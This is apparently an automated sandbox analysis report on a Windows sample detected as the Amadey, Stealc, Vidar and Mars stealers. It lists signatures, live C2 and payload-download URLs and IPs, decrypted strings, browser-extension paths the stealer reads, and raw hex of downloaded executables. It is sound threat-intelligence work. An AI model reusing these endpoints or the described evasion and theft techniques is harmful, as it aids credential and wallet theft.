Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1467093
MD5: 05dda1c444fe4feda4771f75598d55d7
SHA1: 3369deefd76ea12c621aad635547be857720d7d8
SHA256: 9a501e3c19a488ab6672598e26af59a019c471aaf67adcd1dba4734d7a2b9e48
Tags: exe
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exeer Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dllpk Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.4/ Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll:- Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php- Avira URL Cloud: Label: malware
Source: http://85.28.47.4/EM32 Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php/ Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php. Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exe506iN Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll_k Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll( Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dlljk Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpon Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exe Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exepera Avira URL Cloud: Label: phishing
Source: http://85.28.47.4 Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exeAppData Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Found malware configuration
Source: 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: 0.2.file.exe.360000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: explorti.exe.4616.14.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 45%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.file.exe.360000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetProcAddress
Source: 0.2.file.exe.360000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.file.exe.360000.0.unpack String decryptor: lstrcatA
Source: 0.2.file.exe.360000.0.unpack String decryptor: OpenEventA
Source: 0.2.file.exe.360000.0.unpack String decryptor: CreateEventA
Source: 0.2.file.exe.360000.0.unpack String decryptor: CloseHandle
Source: 0.2.file.exe.360000.0.unpack String decryptor: Sleep
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.360000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.360000.0.unpack String decryptor: VirtualFree
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.file.exe.360000.0.unpack String decryptor: VirtualAlloc
Source: 0.2.file.exe.360000.0.unpack String decryptor: HeapAlloc
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.file.exe.360000.0.unpack String decryptor: lstrcpyA
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.file.exe.360000.0.unpack String decryptor: lstrlenA
Source: 0.2.file.exe.360000.0.unpack String decryptor: ExitProcess
Source: 0.2.file.exe.360000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetSystemTime
Source: 0.2.file.exe.360000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.360000.0.unpack String decryptor: advapi32.dll
Source: 0.2.file.exe.360000.0.unpack String decryptor: gdi32.dll
Source: 0.2.file.exe.360000.0.unpack String decryptor: user32.dll
Source: 0.2.file.exe.360000.0.unpack String decryptor: crypt32.dll
Source: 0.2.file.exe.360000.0.unpack String decryptor: ntdll.dll
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetUserNameA
Source: 0.2.file.exe.360000.0.unpack String decryptor: CreateDCA
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.file.exe.360000.0.unpack String decryptor: ReleaseDC
Source: 0.2.file.exe.360000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.360000.0.unpack String decryptor: sscanf
Source: 0.2.file.exe.360000.0.unpack String decryptor: VMwareVMware
Source: 0.2.file.exe.360000.0.unpack String decryptor: HAL9TH
Source: 0.2.file.exe.360000.0.unpack String decryptor: JohnDoe
Source: 0.2.file.exe.360000.0.unpack String decryptor: DISPLAY
Source: 0.2.file.exe.360000.0.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.360000.0.unpack String decryptor: http://85.28.47.4
Source: 0.2.file.exe.360000.0.unpack String decryptor: /920475a59bac849d.php
Source: 0.2.file.exe.360000.0.unpack String decryptor: /69934896f997d5bb/
Source: 0.2.file.exe.360000.0.unpack String decryptor: jony
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.file.exe.360000.0.unpack String decryptor: GlobalLock
Source: 0.2.file.exe.360000.0.unpack String decryptor: HeapFree
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetFileSize
Source: 0.2.file.exe.360000.0.unpack String decryptor: GlobalSize
Source: 0.2.file.exe.360000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.360000.0.unpack String decryptor: IsWow64Process
Source: 0.2.file.exe.360000.0.unpack String decryptor: Process32Next
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetLocalTime
Source: 0.2.file.exe.360000.0.unpack String decryptor: FreeLibrary
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.360000.0.unpack String decryptor: Process32First
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.360000.0.unpack String decryptor: DeleteFileA
Source: 0.2.file.exe.360000.0.unpack String decryptor: FindNextFileA
Source: 0.2.file.exe.360000.0.unpack String decryptor: LocalFree
Source: 0.2.file.exe.360000.0.unpack String decryptor: FindClose
Source: 0.2.file.exe.360000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.360000.0.unpack String decryptor: LocalAlloc
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.file.exe.360000.0.unpack String decryptor: ReadFile
Source: 0.2.file.exe.360000.0.unpack String decryptor: SetFilePointer
Source: 0.2.file.exe.360000.0.unpack String decryptor: WriteFile
Source: 0.2.file.exe.360000.0.unpack String decryptor: CreateFileA
Source: 0.2.file.exe.360000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.file.exe.360000.0.unpack String decryptor: CopyFileA
Source: 0.2.file.exe.360000.0.unpack String decryptor: VirtualProtect
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetLastError
Source: 0.2.file.exe.360000.0.unpack String decryptor: lstrcpynA
Source: 0.2.file.exe.360000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.360000.0.unpack String decryptor: GlobalFree
Source: 0.2.file.exe.360000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.360000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.file.exe.360000.0.unpack String decryptor: OpenProcess
Source: 0.2.file.exe.360000.0.unpack String decryptor: TerminateProcess
Source: 0.2.file.exe.360000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.360000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.file.exe.360000.0.unpack String decryptor: ole32.dll
Source: 0.2.file.exe.360000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.file.exe.360000.0.unpack String decryptor: wininet.dll
Source: 0.2.file.exe.360000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.file.exe.360000.0.unpack String decryptor: shell32.dll
Source: 0.2.file.exe.360000.0.unpack String decryptor: psapi.dll
Source: 0.2.file.exe.360000.0.unpack String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.360000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.360000.0.unpack String decryptor: SelectObject
Source: 0.2.file.exe.360000.0.unpack String decryptor: BitBlt
Source: 0.2.file.exe.360000.0.unpack String decryptor: DeleteObject
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C9C6C80
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2653190824.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49710 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.6:49710 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.6:49710
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.6:49710 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.6:49710
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor IPs: 77.91.77.82
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 16:08:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 16:08:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
